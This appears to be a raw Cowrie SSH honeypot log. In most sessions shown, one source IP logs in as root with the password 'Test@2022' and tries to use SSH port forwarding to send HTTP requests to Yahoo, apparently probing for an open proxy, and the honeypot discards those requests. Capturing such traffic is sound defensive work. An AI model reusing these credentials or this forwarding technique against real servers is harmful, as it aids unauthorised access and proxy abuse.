,"hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:46.586391Z","src_ip":"213.209.150.239","session":"57b3277cbb38"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:46.868024Z","src_ip":"213.209.150.239","session":"57b3277cbb38"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":27606,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:27606","sensor":"my-vps","timestamp":"2025-08-26T00:59:46.925443Z","session":"57b3277cbb38"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:46.982159Z","src_ip":"213.209.150.239","session":"57b3277cbb38"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":5335,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:5335","sensor":"my-vps","timestamp":"2025-08-26T00:59:47.139069Z","session":"57b3277cbb38"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:47.195803Z","src_ip":"213.209.150.239","session":"57b3277cbb38"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:47.253556Z","src_ip":"213.209.150.239","session":"57b3277cbb38"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":5922,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ef8b958db9c","protocol":"ssh","message":"New connection: 213.209.150.239:5922 (1.2.3.4:22) [session: 8ef8b958db9c]","sensor":"my-vps","timestamp":"2025-08-26T00:59:47.299903Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:47.300643Z","src_ip":"213.209.150.239","session":"8ef8b958db9c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:47.348168Z","src_ip":"213.209.150.239","session":"8ef8b958db9c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:47.584201Z","src_ip":"213.209.150.239","session":"8ef8b958db9c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":10270,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:10270","sensor":"my-vps","timestamp":"2025-08-26T00:59:47.632424Z","session":"8ef8b958db9c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:47.679776Z","src_ip":"213.209.150.239","session":"8ef8b958db9c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":22147,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:22147","sensor":"my-vps","timestamp":"2025-08-26T00:59:47.817635Z","session":"8ef8b958db9c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:47.864951Z","src_ip":"213.209.150.239","session":"8ef8b958db9c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:47.913232Z","src_ip":"213.209.150.239","session":"8ef8b958db9c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":5976,"dst_ip":"1.2.3.4","dst_port":22,"session":"87a8bda54a44","protocol":"ssh","message":"New connection: 213.209.150.239:5976 (1.2.3.4:22) [session: 87a8bda54a44]","sensor":"my-vps","timestamp":"2025-08-26T00:59:47.969116Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:47.970142Z","src_ip":"213.209.150.239","session":"87a8bda54a44"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:48.027161Z","src_ip":"213.209.150.239","session":"87a8bda54a44"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:48.310451Z","src_ip":"213.209.150.239","session":"87a8bda54a44"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":12423,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:12423","sensor":"my-vps","timestamp":"2025-08-26T00:59:48.367993Z","session":"87a8bda54a44"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:48.424851Z","src_ip":"213.209.150.239","session":"87a8bda54a44"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":2881,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:2881","sensor":"my-vps","timestamp":"2025-08-26T00:59:48.579084Z","session":"87a8bda54a44"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:48.635755Z","src_ip":"213.209.150.239","session":"87a8bda54a44"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:48.693572Z","src_ip":"213.209.150.239","session":"87a8bda54a44"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":6031,"dst_ip":"1.2.3.4","dst_port":22,"session":"41ae5210347d","protocol":"ssh","message":"New connection: 213.209.150.239:6031 (1.2.3.4:22) [session: 41ae5210347d]","sensor":"my-vps","timestamp":"2025-08-26T00:59:48.749103Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:48.749739Z","src_ip":"213.209.150.239","session":"41ae5210347d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:48.806933Z","src_ip":"213.209.150.239","session":"41ae5210347d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:49.089041Z","src_ip":"213.209.150.239","session":"41ae5210347d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":18881,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:18881","sensor":"my-vps","timestamp":"2025-08-26T00:59:49.146567Z","session":"41ae5210347d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:49.203393Z","src_ip":"213.209.150.239","session":"41ae5210347d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":5733,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:5733","sensor":"my-vps","timestamp":"2025-08-26T00:59:49.359097Z","session":"41ae5210347d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:49.415674Z","src_ip":"213.209.150.239","session":"41ae5210347d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:49.473091Z","src_ip":"213.209.150.239","session":"41ae5210347d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":6098,"dst_ip":"1.2.3.4","dst_port":22,"session":"a86b63f7bf19","protocol":"ssh","message":"New connection: 213.209.150.239:6098 (1.2.3.4:22) [session: a86b63f7bf19]","sensor":"my-vps","timestamp":"2025-08-26T00:59:49.519347Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:49.520221Z","src_ip":"213.209.150.239","session":"a86b63f7bf19"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:49.567528Z","src_ip":"213.209.150.239","session":"a86b63f7bf19"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:49.803208Z","src_ip":"213.209.150.239","session":"a86b63f7bf19"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":13301,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:13301","sensor":"my-vps","timestamp":"2025-08-26T00:59:49.851634Z","session":"a86b63f7bf19"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:49.899441Z","src_ip":"213.209.150.239","session":"a86b63f7bf19"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":3202,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:3202","sensor":"my-vps","timestamp":"2025-08-26T00:59:50.037780Z","session":"a86b63f7bf19"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:50.086102Z","src_ip":"213.209.150.239","session":"a86b63f7bf19"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:50.134974Z","src_ip":"213.209.150.239","session":"a86b63f7bf19"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":6131,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a1e4c1acaed","protocol":"ssh","message":"New connection: 213.209.150.239:6131 (1.2.3.4:22) [session: 3a1e4c1acaed]","sensor":"my-vps","timestamp":"2025-08-26T00:59:50.190264Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:50.191403Z","src_ip":"213.209.150.239","session":"3a1e4c1acaed"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:50.248493Z","src_ip":"213.209.150.239","session":"3a1e4c1acaed"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:50.531397Z","src_ip":"213.209.150.239","session":"3a1e4c1acaed"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":5209,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:5209","sensor":"my-vps","timestamp":"2025-08-26T00:59:50.589379Z","session":"3a1e4c1acaed"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:50.647066Z","src_ip":"213.209.150.239","session":"3a1e4c1acaed"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":2453,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:2453","sensor":"my-vps","timestamp":"2025-08-26T00:59:50.803076Z","session":"3a1e4c1acaed"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:50.860194Z","src_ip":"213.209.150.239","session":"3a1e4c1acaed"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:50.917753Z","src_ip":"213.209.150.239","session":"3a1e4c1acaed"}
